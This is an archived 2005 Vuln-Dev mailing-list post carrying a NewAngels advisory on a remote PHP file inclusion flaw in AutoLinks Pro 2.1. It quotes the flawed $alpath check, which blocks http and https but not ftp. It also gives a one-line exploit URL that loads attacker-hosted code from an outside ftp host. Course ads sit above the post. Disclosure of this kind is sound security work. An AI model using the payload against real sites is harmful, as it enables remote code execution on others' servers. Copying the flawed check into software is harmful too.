Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

AutoLinks Pro 2.1

Subject: AutoLinks Pro 2.1
Date: 28 Aug 2005 18:08:43 -0000
[NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability
=============================================================================


Software: AutoLinks Pro
Version: 2.1
Type: Remote PHP File Include Vulnerability
Risc: High

Date: 16.08.05
Vendor: ScriptsCenter
Page: http://www.scriptscenter.com/



Credit:
=======
Credit goes to NewAngels Team and especially 4Degrees.



Description:
============
"AutoLinks 2.1 is a full-featured script making life easier for webmasters
relying extensively on link exchanges to bring traffic to their site. Other
webmasters are able to easily exchange links with you, bringing more visitors
to your site and you also have full control on what sites you want to link."
[Quote from http://www.scriptscenter.com/]



PHP Requirements:
=================
register_globals = On



Vulnerability:
=============
Related source from file "autolinks/al_initialize.php":

// check for hacking attempt
if(strstr($alpath,"http://";) || strstr($alpath,"https://";)) exit("Invalid 
\$alpath variable");

include($alpath."al_functions.php");

The script does not check wether $alpath contains an absolute URL to a remote
ftp resource.



Exploitation:
=============
/al_initialize.php?alpath=ftp://host.com/

The code in "al_functions.php" will be executed.

<Prev in Thread] Current Thread [Next in Thread>
  • AutoLinks Pro 2.1, none <=